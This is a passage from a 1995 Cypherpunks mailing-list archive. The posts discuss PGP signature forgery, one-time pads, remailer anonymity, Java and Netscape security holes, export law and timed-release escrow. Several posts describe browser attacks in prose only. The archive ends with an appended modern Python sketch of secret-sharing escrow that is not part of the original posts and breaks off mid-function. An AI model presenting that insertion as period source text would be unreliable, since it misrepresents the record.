signed it. Someone might have a web server that asks Netscape Navigator (very politely) to send out someone's secret PGP keyring, or asks Navigator to monitor a person's keystrokes when they enter their password, or heaven forbid their electronic daytimer. Once you have that, it's easy to send a forged PGP SIGNED email. Even worse, most readers of email will tend to believe that an electronic signature is prima facie evidence that a message is from who it appears to be from. It just doesn't work that way. 
You have to look at the message and use "fuzzy" logic to determine how probable it is that a given message is from the person who it represents itself as coming from. And sometimes, you'll be wrong. Just like the good old, "Dr. Frederick B. Cohen", who posted to this list. Is he really the Dr. Cohen, noted international computer virus expert, the very man who coined the term "computer virus", or isn't he? Is he the man who the US military approached to verify whether missile guidance systems could be compromised by a foreign power utilizing a trojan horse or virus, or not. Do we believe his web page?? Even if we do, do we place a greater degree of trust in his words, than that of say, yours truly, Alice de 'nonymous, or of someone who claims to be Tim May when they BOTH say that there are very serious flaws and deficiencies in the Netscape Navigator product? Or do we infer that a "no comment" coming from AT&T and Netscape, acts as confirmation that the *information* in the post is reliably correct. It's impossible to say with certainty. Maybe if someone on this mailing list attended Dr. Cohen's talk today at the Hilton Hotel, in Washington, D.C., and fills us in with what he said, (if we can trust _that_ poster) and we independently verify for ourselves whether what _he_ (Dr. Cohen or Mr. Confirmation) is saying *seems* to be reasonable, then we _might_ be able to say that we _may_ be reasonably certain, that we DO have an international celebrity amongst us and posting to this list, and notifying the world of a serious problem. I mean what would you expect, a Press Release?? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. 
From stewarts at ix.netcom.com Tue Nov 7 21:07:01 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 8 Nov 1995 13:07:01 +0800 Subject: using pgp to make an otp Message-ID: <199511080454.UAA08618@ix.ix.netcom.com> At 11:31 PM 11/6/95 EST, Derek Atkins wrote: >> PGP output is not random enough to be used for a one time pad. >> The security of a OTP is *entirely* based on the quality of the random >> numbers; they should come from some strong generator. Building good >> one time pads is tough, and usually not worth the effort. > >No, however the output of "pgp +makerandom=XXX filename.dat" _IS_ >random enough for an OTP. The problem then becomes distributing this >data. amp had written: | my point here is that _if_ pgp output is random enough, i wouldn't need | hardware. even i, with my extremely limited programming skills could create | a .cmd file or program that could be used as input for a stream cypher. The output of PGP should be random enough for your application, as long as you don't think you're getting a cryptographically-correct OTP out of the deal. PGP uses its randpool stuff in its random number generation, so there are likely to be at least 24 bytes of real randomness kept around, maybe more depending on the size of your randpool, but the rest of your security comes from algorithm quality and is theoretically crackable like any pseudo-random sequence (albeit requiring exponentially-large crackwork.) It's using IDEA in a feedback mode, so it's better than just repeated MD5s. The output of PGP +makerandom probably is secure enough for most applications, depending on how many bits you're using, what you're doing with it, and how paranoid you need to be. Check out the code to be sure. 
You may have special applications such as amp's stream cypher for which it's more convenient to XOR the makerandom instead of using PGP, but watch out for attacks like known-plaintext, which can really bite you in secure-voice systems where there's a lot of near-silence. Careless protocol work can spoil really decent random numbers.... #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From anonymous-remailer at shell.portal.com Tue Nov 7 21:21:55 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 8 Nov 1995 13:21:55 +0800 Subject: PGP Comment feature weakens remailer security Message-ID: <199511080454.UAA05765@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Suppose you want to mail or post something sensitive enough to chain through several remailers with PGP encryption at every stage to protect the privacy of communications. PGP can bite you. The PGP comment feature lets you stick one (or more?) lines of comment into your encrypted messages, after the Version: line but before the encrypted message body. If you use the PGP comment feature to say something more or less unique (mine says that you can get PGP outside the country from ftp.ox.ac.uk), anybody eavesdropping the last remailer in your chain can notice this in the remailer's input and recognize that it's from you, even though you've chained through six different places to get there. It's still encrypted, and protected to the extent that the remailer protects you, but if the remailer is corrupt or your message can be identified by size among the other remailer inputs, you're hosed. 
So, for safety, either turn off PGP comments before using it with remailers, or wipe out the comments by hand before each layer of encryption (easy to do with GUI-based systems like Private Idaho; I don't know if premail lets you do this or not.) Bill Stewart -----BEGIN PGP SIGNATURE----- Version: 2.7.1 Comment: PGP available outside U.S.A. at ftp.ox.ac.uk iQBVAwUBMKAgw/thU5e7emAFAQFStwH/QnIiiaeSmUp1YynDBLVo3HAWsVkS0nx8 Fc95Mr0YJ/YIoRDz+xuNgLHbjJZSTUbhOnigMRb7JLNqhmCGvS5RBQ== =ZWhB -----END PGP SIGNATURE----- #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From ktk at anemone.corp.sgi.com Tue Nov 7 22:01:21 1995 From: ktk at anemone.corp.sgi.com (Katy Kislitzin) Date: Wed, 8 Nov 1995 14:01:21 +0800 Subject: EARLY WARNING: December SF Bay Area Cypherpunks Message-ID: <199511080549.VAA04978@anemone.corp.sgi.com> Hi-- Eric Messick and I will be holding the December C'punks meeting at our geodesic dome in the Santa Cruz Mountains. It will be a combination meeting and holiday get-together. It will be happening on the usual c'punks saturday, Dec 9, but will start at 4:00 pm instead of the usual noon. A more spirited announcement will follow closer to the date. --kt From bglassle at kaiwan.com Tue Nov 7 23:13:20 1995 From: bglassle at kaiwan.com (Bob Glassley) Date: Wed, 8 Nov 1995 15:13:20 +0800 Subject: Lotus Notes RSA Implementation Question Message-ID: <199511080702.XAA22876@kaiwan.kaiwan.com> -----BEGIN PGP SIGNED MESSAGE----- I am currently considering using Lotus Notes for a group-ware solution where security is of great importance. I have studied Notes documentation regarding their implementation of the RSA encryption library, but it leaves some unanswered questions. If anyone on the list has knowledge of the following items, I would be very grateful. 1) What is the key size used by the USA licensed version? 
2) Considering RC4 is a proprietary scheme, have there been any concerted efforts to validate its strength or lack of? If so, could you give a pointer to any documents I could review. ...Bob Glassley -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMKBVtW7xvKhVs/sNAQHCowP+LF2stvSPzatDfAkKx2DfU8sH5S7p6KwN PwDEak9it1Uq0eALHWVTc3VZ3WYY+6XIjYNnNyfdKsgehXb+2dVEgjz1qbHyK+uE 3JhlYOeCfBcXUrTbilAoYXghJHvrpJq8z+Pa6u2W5Wgxks+t9MYzjV3YKLM2Nj6Z y6jbBUcyyNc= =TN1O -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Wed Nov 8 01:35:34 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 8 Nov 1995 17:35:34 +0800 Subject: Crypto++, Cpunk Icons, list noise Message-ID: <199511070727.XAA06592@jobe.shell.portal.com> On Mon, 6 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote: >> And as the messenger, I (hope) I don't have anything to fear, from the >> NSA or any other foreign group that would seek to pursue its own agenda >> within the borders of sovereign Canada. I really don't think that the >> NSA is "evil incarnate", as some list subscribers do. They have their >> intelligence and know how to use it. Usually, they use it prudently. > >They have a nice friend (the author of Spyworld would say outpost) >right here in Ottawa at the Communications Security Establishment. Yes. I'm well aware of where I can find an Operations Officer, if I need to. Locally, in fact. Don't really have to go to Ottawa, for that. (Wrong guess, btw ...) >They (CSE) seem to have done some recent spying on the opposition >parties and Quebec separatists (so I vaguely recall having read in >several places. Yes. At least in this part of the country, we're relatively ho-hum (big yawn) about scouts and scouting. Part of the territory, I guess. We're Canadian. We're civilized about these things. >If you're ever in town, they're just a bit past Carleton U. on Heron. 
>(it doesn't say CSE on the signs, but the guy at the gate will tell you so) Thanks. Personally, I'm much more interested in the Museum of Civilization. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From anonymous-remailer at shell.portal.com Wed Nov 8 01:36:21 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 8 Nov 1995 17:36:21 +0800 Subject: Java insecurity - long - argumentative - you are warned. Message-ID: <199511070722.XAA05420@jobe.shell.portal.com> On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote: > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED! > > 4.2 Security in the Java Environment > > > > Security commands a high premium in the growing use of the Internet > > for products and services ranging from electronic distribution of > > software and multimedia content, to "digital cash". The area of > > security with which we're concerned here is how the Java compiler and > > run-time system restrict application programmers from creating > > subversive code. [long list of important questions deleted ...] Essentially, I think that all of this will distill to a single issue, vis-a-vis Java or any other paradigm which wishes to represent itself as *secure*. Where is the security review role placed within the project development life cycle?? Is it at Design Concept? Or during Application Development? Or is it done last, after design completion, after all of the programming is complete and the production people are involved in operational turnover. Or is it done at all? This concept is not new, and should not present any problems to anyone in the industry. Even John Q. Public will understand it, if we use a simple construction analogy. If you want to build a secure house, your security doesn't start AFTER the house is built. 
It has to start at a very early stage. It starts before the blueprints are made, when you specify that you want a concrete windowless box located on a quiet street at the end of a cul-de-sac. That is simple and obvious. You certainly don't have *security* if after building a glass house on Main Street, if after the design is finished, the footings have been poured, and the key is about to be turned over to the occupant; if then, as an afterthought you put a single strong deadbolt on the front door to "secure" it. Anyone who can't or won't quite grasp this idea is either willfully attempting to steer gullible individuals astray, or is congenitally stupid. It's time to call a spade a spade. > What exactly does this mean? > > > While all this checking appears excruciatingly detailed, by the time > > the byte code verifier has done its work, the Java interpreter can > > proceed knowing that the code will run securely. Knowing these > > properties makes the Java interpreter much faster, because it doesn't > > have to check anything. Yikes!! I'll leave this for someone else to address. This sounds to me like a variation on virus scanning. I think that there are far more reputable virus experts than I who can comment and expand on *flaws* with that approach. > No runtime checking whatsoever. Get past the supposed verifier, and you > have free run of the machine. A single verifier bug or inadequacy, and > the world is unsafe for electronic commerce. As someone who *vividly* remembers October, 1987 and the near economic meltdown which was BARELY averted by the Fed, a near meltdown which occurred because of the interactions of systems far less intelligent or complex than those we routinely utilize today, systems which directly interface not only to each other, but have undocumented, non-predictable interactions with "soft and wet" systems, I might have some serious concerns. Then again, it is _only_ the economy, isn't it? > ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF. 
> > P.S. > > When: Tuesday, November 7, 8AM > Where: The Hilton, Washington D.C. (the CSI conference) > The talk: 50 Ways to Attack Your World Wide Web Systems > > If you want a chance to heckle - be there. Drat ... I don't think that I'll be able to attend. I've already got a local presentation that I've pencilled in for tomorrow morning at some god awfully early hour. Then again, D.C. isn't quite my circuit. I was hoping though for some clarification. Are you THE Dr. Frederick B. Cohen?? The one who originally coined the phrase "computer virus" and who maintains the computer virus FAQ? Are you THAT Dr. Frederick B. Cohen, and are you speaking publicly in Washington, tomorrow as one of the keynote speakers? If you are, I'd be interested as to whether you'll talk about the recent gaping security hole in the existing installed Navigator code base which I detailed to this list's subscribers. The one posted this last Friday the Thirteenth, that questioned Netscape's wisdom in creating an experimental MIME object which does not follow the usual HTTP request/response paradigm, but instead allows a server to open and maintain a bi-directional communications channel from server to client. Effectively a non-password protected telnet into the heart of any system, an open exploitable connection which penetrates proxy servers and firewalls, and acts as an enhanced bi-directional delivery/recovery mechanism? I'd be very interested in the comments around that, especially since both Netscape and AT&T (who distributes the software under its own brand name) have made an explicit "no comment". I'd especially be interested in any post-session transcript. I also think that Elaine Garzarelli might be interested. Especially since she'll be addressing the nation and the public via the public television airwaves this Friday evening. Or at least ... uhmmm ... I _think_ that's when her electronic daytimer has her pencilled in ... Alice de 'nonymous ... ...just another one of those... P.S. 
This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From jbell at capecod.net Wed Nov 8 04:31:36 1995 From: jbell at capecod.net (John Curtis) Date: Wed, 8 Nov 1995 20:31:36 +0800 Subject: expiration dates on cryptography Message-ID: <01BAADAA.DFB5F740@hy36.capecod.net> The discussion between Mr. May and Mr. Shields concerning time-release cryptography raised an interesting question in my mind. Given that trust is often of an ephemeral nature, it would be quite useful to set time limits on secrets. Would it be possible to cryptographically protect a secret such that it could not be decrypted after a certain time? I suspect that the laws of thermodynamics might prohibit this in classical cryptography because as a message expired the amount of entropy would decrease. Quantum cryptography might work, but that will be science fiction for some time to come. Has anyone either shown how to do this or proven it impossible? From perry at piermont.com Wed Nov 8 06:17:03 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 8 Nov 1995 22:17:03 +0800 Subject: expiration dates on cryptography In-Reply-To: <01BAADAA.DFB5F740@hy36.capecod.net> Message-ID: <199511081406.JAA00267@jekyll.piermont.com> John Curtis writes: > The discussion between Mr. May and Mr. Shields concerning > time-release cryptography raised an interesting question in my > mind. > > Given that trust is often of an ephemeral nature, it would be > quite useful to set time limits on secrets. Would it be possible > to cryptographically protect a secret such that it could not be > decrypted after a certain time? No. .pm From perry at piermont.com Wed Nov 8 06:19:22 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Wed, 8 Nov 1995 22:19:22 +0800 Subject: DejaNews all over again In-Reply-To: <199511080306.TAA10540@jobe.shell.portal.com> Message-ID: <199511081408.JAA00279@jekyll.piermont.com> anonymous-remailer at shell.portal.com writes: > I wish that Detweiler could (seriously) go back to wherever he came from. What a fascinating statement to make, considering that you are probably Detweiler. > Alice de 'nonymous ... > > ...just another one of those... > > > P.S. This post is in the public domain. > C. S. U. M. O. C. L. U. N. E. > > From stewarts at ix.netcom.com Wed Nov 8 07:52:25 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 8 Nov 1995 23:52:25 +0800 Subject: Newt on Crypto Message-ID: <199511080454.UAA08566@ix.ix.netcom.com> >From John Young's posting CYB_lip of a column from the Washington Post > "At some point in the not-very-distant future," said > Speaker Newt Gingrich (R-Ga.) in an August interview in > Wired with computer guru Esther Dyson, "somebody is going > to have encryption you can't break.... Governments are not > going to be able to stop it." Newt's an optimist (from the government perspective.) At some point in the not-very-distant future, _everybody_ is going to have encryption the government can't break! #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From adam at lighthouse.homeport.org Wed Nov 8 08:06:45 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Thu, 9 Nov 1995 00:06:45 +0800 Subject: Exporting software doesn't mean exporting In-Reply-To: <199511081517.JAA00972@galil.austnsc.tandem.com.> Message-ID: <199511081544.KAA06043@homeport.org> Since the size of the net is more than doubling each year, over half the people online at any given time are newbies.* It is not reasonable to expect a newbie to understand IP routing. Neither IP routing nor the design of the backbone is intuitively obvious. 
Therefore, it is not reasonable to assume that a user in Italy or Germany has any idea that their packets might travel through the United States. Nor is it reasonable to assume that a user outside the US is familiar with the ITARs. They're an obscure set of regulations, on the surface contrary to the First Amendment, and not even well known within the United States. I find it hard to believe that given the obscurity of IP routing, the backbone design, and the obscurity of the ITAR that a jury would find a foreign person guilty of unknowing violations of the ITAR. Any comment on this line of reasoning from our lawyer friends? Adam Sten Drescher wrote: | Adam Shostack said: | | AS> Thus, if the user in Italy has no reason to expect that their | AS> mail to Germany will traverse the US, then I suspect that the US | AS> would have a hard time proving any criminal act. Doesn't a criminal | AS> act require intent of some type? If IP routing, in conjunction with | AS> SMTP, beyond the control of the users, ships packets through the US, | AS> I have a hard time believing that that makes those users criminals. | | IANAL, but if they have the intent to transfer cryptographic | software, and can 'reasonably' (wonderful precision there) be expected | to know that there is the potential for portions of the transfer to be | routed through US systems, then I'm guessing that it could be construed | that they had the intent to commit a crime. -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at got.net Wed Nov 8 12:09:37 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 9 Nov 1995 04:09:37 +0800 Subject: nym-compoop Message-ID: [I have taken the liberty of deleting "speaker at leg.state.vt.us" and "villuzzi at leg.state.vt.us" from the cc: list, as I think cross-pollinating our list with state assembly houses is even worse than being "assimilated" by wwwbuyinfo and e$-list.]
At 2:35 AM GMT 11/6/95, Stephen Whitaker wrote: >Eating my tasty crow gives rise to another question relating to the timing >and continuity of these threads: How did the first responder on the RE: >134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting >of 7:19AM on Nov 5? Which way is this thing spinnin? Have you heard of time zones? The first message, from Anonymous, was sent from the Replay remailer (in Amsterdam, I recall). Date: Sun, 5 Nov 1995 07:20:12 +0100 Subject: lp (134.222.35.2)? To: cypherpunks at toad.com From: nobody at REPLAY.COM (Anonymous) 07:20 in the +0100 timezone is of course 22:20 of the previous day (Saturday) in the -0800 time zone. The reply by Spero was sent Date: Sat, 4 Nov 1995 22:48:39 -0800 (PST) From: Simon Spero X-Sender: ses at chivalry To: Anonymous Looks harmless to me. However, there is increasing evidence the intelligence agencies have managed to open up a portal in time, using the tachyonic devices being manufactured by Tachytronx, of Woodland Hills. These time portals are used by Science Applications to launder money back to eras in which it was needed. One of the major remailers is located on a system called "Portal," which ought to be enough to convince anyone in these paranoic times. --Klaus! von Future Prime, whose chronotransport secrets now stand revealed From dlv at bwalk.dm.com Wed Nov 8 12:12:03 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Thu, 9 Nov 1995 04:12:03 +0800 Subject: using PGP only for digital signatures In-Reply-To: <199511060208.VAA14123@panix.com> Message-ID: Duncan Frissell writes: > >Proving legal residency requires a combination of two documents, one each > >from specified lists. Most commonly a driver's license, green card (which > >is actually pink), or birth certificate from list A, and a social > >security card from list B. > > You need proof of citizenship or residency and proof of identity. Passport > and naturalization papers work for both. 
Otherwise you have to pay the $25 > to the guy on the corner for a birth certificate and drivers license. Or > DTP it yourself since employers aren't very good at checking papers. Or > dodge the whole thing and work for yourself. I've had to deal with I-9 twice in the last 6 months; both times they happily accepted my U.S.Passport as both the proof of identity and the proof of work authorization. The naturalization certificate is a little tricky because it's not supposed to be photocopied. I suppose the h.r. would take it (because it's listed on the I-9) and photocopy it despite the warning on it. :) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From whitaker at sover.net Wed Nov 8 12:15:04 1995 From: whitaker at sover.net (Stephen Whitaker) Date: Thu, 9 Nov 1995 04:15:04 +0800 Subject: nym-compoop Message-ID: <199511060335.WAA04917@maple.sover.net> I'm glad "nobody" thinks I'm a nym for being a good eight hours:fifty-nine minutes out of step and having lowered my reputation in his/her eyes. Now I'll ask my question again, which apparently got lost in the collective groan of my stale post: Are there ways for someone with access to modify router tables to constantly create alternate paths at other routers which would serve to end-around any such snoops? This question is now offered in the context of the _hypothetical_situation_ of there being snoops out here in the first place. Later I'll ask about sniffing for sniffers. One reason for this post is the fact that certain ambitious bureaucrats here in Vermont have decided to build, own and control the internet, connecting governments, schools and a few businesses. There is no encryption in use by the government agencies and they have let the school hackers and teachers on now to share the T-1 backbone with the state agencies and contractors (medicaid/EDS) carrying personal information collected and managed by state government.
These [ir]responsible parties refuse to provide any documentation requested under public records law demonstrating that a security plan or practice is in place. The high schools are offered 56K circuits for $5K/annual and a share of a gov'ment network manager who won't answer his e-mail and doesn't know where to begin looking for copies of it, when it too is requested under our public records laws. Our governor stated in his address to the legislature that these 56K lines will let an "unlimited number of students access the internet simultaneously". Anybody got a bridge? I sure would like to hear from some folks who would be willing to aid in paying close attention, discussing the implications and appropriateness of encryption technologies for this situation, aiding in testing for sniffers, etc. This request is offered as an attempt to keep a step ahead of the public/private competition, privacy accident-waiting-to-happen and the surveillance potential/practice of such a beast. If someone who feels strongly that this is off-topic for this list makes that case I'll carry my inquiry elsewhere, after a little cross-fire, of course. I even went back and just now read the "Welcome to" message to see whether these issues fall within the scope. I can hardly find anyone who even cares about the fact that our legislature relies on the executive branch gov-net managers for their port/connection on the internet router. They also rely on the executive branch for troubleshooting their Novell LAN. Does anyone else see a separation of powers issue or privacy issue here? Note that I cc: the speaker, who cares but doesn't yet grasp the implications. Feel free to write him directly. His name is Michael Obuchowski, Obe for short, , tell him I sent you. At this point offering encryption software to school age kids is a whole lot easier than convincing bureaucrats that it's a good practice. This won't solve the problem of poor practice by government though.
Unfortunately this will also likely frighten the school network techies, administrators and school board members. Anybody have a copy of any good, tight, discovery orders which can be useful in gaining court ordered access to prevent destruction of evidence and for combing the electronic files and e-mail of these accountable public servants to demonstrate that they don't know what they're doing? (responses to the legal points by private e-mail please. Do I come across as litigious?) The Boston Globe did a good front page story a week or ten days ago entitled "e-mail as evidence". Mostly the story was relating to lawyers and consultants making big money aiding corporations to assure that the really damaging, unencrypted e-mail is thoroughly scrubbed from all systems. Back to where this started: Eating my tasty crow gives rise to another question relating to the timing and continuity of these threads: How did the first responder on the RE: 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting of 7:19AM on Nov 5? Which way is this thing spinnin? Stephen Whitaker P. O. Box 1331 Montpelier, Vermont 05601-1331 802.479.6118 From warlord at MIT.EDU Wed Nov 8 13:33:52 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Thu, 9 Nov 1995 05:33:52 +0800 Subject: using pgp to make an otp In-Reply-To: <199511070407.XAA04557@homeport.org> Message-ID: <199511070431.XAA17598@toxicwaste.media.mit.edu> > PGP output is not random enough to be used for a one time pad. > The security of an OTP is *entirely* based on the quality of the random > numbers; they should come from some strong generator. Building good > one time pads is tough, and usually not worth the effort. No, however the output of "pgp +makerandom=XXX filename.dat" _IS_ random enough for an OTP. The problem then becomes distributing this data.
-derek From hallam at w3.org Wed Nov 8 13:37:26 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 9 Nov 1995 05:37:26 +0800 Subject: Exporting software doesn't mean exporting (was: Re: lp ?) In-Reply-To: <199511070400.XAA14905@jekyll.piermont.com> Message-ID: <9511070433.AA11349@zorch.w3.org> >Were that the case, citizens couldn't sue to have provisions impacting >them enforced, but the fact of the matter is that they can. Various treaties provide that various privileges will be granted to various citizens of the countries concerned. Do the treaties grant such privileges in this case? Just because there is a treaty on nuclear disarmament between the US and the USSR does not mean that you as a private citizen can press for enforcement through the courts if you think that the USSR is not performing. >> Perry's somewhat offensive language is not a substitute for an argument. >Thank you for the ad hominem. Perry used the phrase "lobotomized mongoloid judge" I think that this type of language is offensive and unnecessary. Ad hominem is a perfectly valid form of argument where one is considering the reputation of the person making the statement. I don't think that the type of language and tactics Perry uses reflect well upon him. What is "I am starting to have trouble believing you are a lawyer." if not ad hominem in any case? From herbs at interlog.com Wed Nov 8 13:37:30 1995 From: herbs at interlog.com (Herb Sutter) Date: Thu, 9 Nov 1995 05:37:30 +0800 Subject: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE Message-ID: <199511070413.XAA07602@gold.interlog.com> I've always read with interest Sameer's notes, and I also enjoyed this one.
I just can't figure out why he's writing it (spelling and grammar errors aside): At 07:52 11.06.1995 -0800, sameer wrote: >For Immediate Release >Date: Nov 6th, 1995 >Contact: Sameer Parekh 510-601-9777 sameer at c2.org > >PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE This title and the opening paragraphs seem unnecessarily (and misleadingly[*]) alarmist, given the recent spate of similar mass-media articles. After the lead and second paragraphs repeatedly talk about "holes", "make viruses and other malicious programs possible", etc., it isn't until the third paragraph that we read a calmer quote: [*] Java isn't really 'Internet security software', and the students didn't find a hole in any current version according to the rest of the text. >"While we did find some interesting holes, we believe these can be >addressed and Java could make a good standard for remote code on the >Web, if an effective security policy is defined." The opening paragraphs sure didn't reflect this. Then: >The holes they found exist only in the alpha release of HotJava. The >beta release, which is the version found in the widely-used Netscape >Navigator 2.0b1J is not vulnerable to these attacks. They do? It's not? Then... why mention it at all?! If this is so, it's a dead issue, old news, passe'. Why another alarmist press release (other than to promote Community ConneXion's decision to add Java to its hit list )? The public's paranoid enough about net commerce; why should we, of all people, fan the flames? This isn't to bash Sameer, whose posts I always enjoy reading. I'm just a bit puzzled by this one... Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From tcmay at got.net Wed Nov 8 13:37:51 1995 From: tcmay at got.net (Timothy C. 
May) Date: Thu, 9 Nov 1995 05:37:51 +0800 Subject: Paranoia Has Its Uses Message-ID: At 4:10 AM 11/7/95, Carl Ellison wrote: > ``According to the former head of Romania's secret police, Ion Mihai >Pacepa, there had been ten million microphones in a country of twenty-three >million people. That would mean that nearly everyone had been listened to >and then blackmailed into listening and reporting on others. A maze of >psychic tunnels led from one person to another.'' [Andrei Codrescu, "The >Hole In The Flag", pp. 21-22] This was the Romanian version of key escrow, don't you know? "Conversation Escrow" was scrupulously safeguarded in Ceausescu's Romania, with conversations only unlocked if a "court order" was obtained lawfully. (Of course, governments get to make the laws, get to enforce them, and so it goes.) Theodore Roszak, influential author of "The Making of the Counterculture" (1969), was bemoaning the apparent distrust people now have in governments, and thinking he and his generation are partly to blame for the current paranoia and mistrust. He was bemoaning the fact that nobody trusts that government can fix society's problems, that everyone from leftists to rightists apparently hates the way government works. Relevance? Next time someone mentions "safeguards" in connection with GAK, remind them about Tricky Dick and his "Enemies List." Or about possibly greater abuses by other presidents. Remind them of what might happen if a Religious Right president is trying to crack down on abortions, pornography, and drugs. This may make a doubter out of someone. It may be paranoia, but paranoia has its uses. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Wed Nov 8 13:39:26 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 9 Nov 1995 05:39:26 +0800 Subject: Timed-release crypto and information economics Message-ID: First, let me congratulate Michael Shields for working on this problem, and for (possibly?) coming up with a cleaner scheme. I confess that I'm not clear on how his scheme differs from mine. Let me hasten to add that my 1993 proposal was intended to be more conceptual than practical, to illustrate how distributed escrow agents (escrow in the real sense, not in the GAK sense) could be used to "send messages into the future," a tool that has several intriguing applications, some of which Michael explores in the second part of his post. At 12:09 AM 11/7/95, Michael Shields wrote: >In the May proposal, when you have a message to be encrypted, you >encrypt it with a session key, optionally split that key with an n-of-m >scheme, and then send the key into a network of escrow agents, which are >instructed to hold the message for a given period of time. You then >hold onto the encrypted message, though you need not keep it secret. >Conceptually, you have encrypted a message and then remailed the key to >yourself in such a way that it will take X length of time to arrive. Sending either the pieces of the message or the pieces of the key seem closely related to me (they go together). In principle, it is only the key that counts, so that is what I would focus upon. >I have a simpler, public-key plan. When you want to keep a message >secret until date X, you ask your favorite crypto house to generate a >key pair and hold the secret key until date X.
You then encrypt your >message with the public key, and again hold onto the encrypted message. >N-of-m trust management can be implemented by secret-sharing your message >and encrypting each with a key generated by a different crypto house. This seems to be saying the same thing. In both cases, "Alice" is either distributing a message to "Bob," "Charles," "Donna," etc., with instructions not to return the pieces until Date X, or is holding onto a sealed message but asking that the decryption keys not be returned until Date X. I don't see the real difference, modulo some minor factors. In neither case can the original message be reconstructed unless n out of m of the escrow agents provide the pieces. I hope we are not miscommunicating because of terminology or because of the continuing Net problem of not being able to draw pictures showing what is going on. >I'll let everyone tear into this for a few days, and then I'll put up a >server for timed-release key generation, charging maybe c$1. I'd like >to then enhance it to be capable of issuing bonds and loans denominated >in c$. (I like the cyberbucks trial because it's officially play money, >so there aren't any regulatory burdens.) This should be interesting. In any case, I look forward to seeing reaction to this. This could be an important service. (In many ways much more interesting than fairly mundane "Internet commerce" applications.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway."
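The n-of-m escrow arrangement discussed in the message above, sketched as an added example that is not code from either poster: a session key is split among m escrow agents, each of whom releases a share only from Date X on, and any n released shares rebuild the key. Assumptions: Shamir's secret sharing is used as the n-of-m scheme (the posts name none), the SHA-256 keystream is a toy stand-in for a real cipher, the agents are trusted to honour the date, and `EscrowAgent`, `seal` and `open_sealed` are hypothetical names.

```python
import hashlib
import secrets
from datetime import datetime, timedelta, timezone

# 2**521 - 1 is a Mersenne prime; the field comfortably holds a 256-bit key.
P = 2**521 - 1
KEY_LEN = 32


def split_key(key, n, m):
    """Shamir split: any n of the m returned (x, y) shares rebuild the key."""
    if not 1 <= n <= m:
        raise ValueError("need 1 <= n <= m")
    # Random polynomial of degree n-1 whose constant term is the key.
    coeffs = [int.from_bytes(key, "big")]
    coeffs += [secrets.randbelow(P) for _ in range(n - 1)]
    shares = []
    for x in range(1, m + 1):
        y = 0
        for c in reversed(coeffs):  # Horner evaluation mod P
            y = (y * x + c) % P
        shares.append((x, y))
    return shares


def combine(shares):
    """Lagrange interpolation at x = 0 recovers the constant term (the key)."""
    secret = 0
    for xi, yi in shares:
        num = den = 1
        for xj, _ in shares:
            if xj != xi:
                num = (num * -xj) % P
                den = (den * (xi - xj)) % P
        secret = (secret + yi * num * pow(den, -1, P)) % P
    if secret.bit_length() > 8 * KEY_LEN:
        # Too few (or mismatched) shares interpolate to a random field element.
        raise ValueError("shares do not reconstruct a valid key")
    return secret.to_bytes(KEY_LEN, "big")


def xor_stream(key, data):
    """Toy cipher (assumption): XOR with SHA-256(key || block offset)."""
    out = bytearray()
    for off in range(0, len(data), 32):
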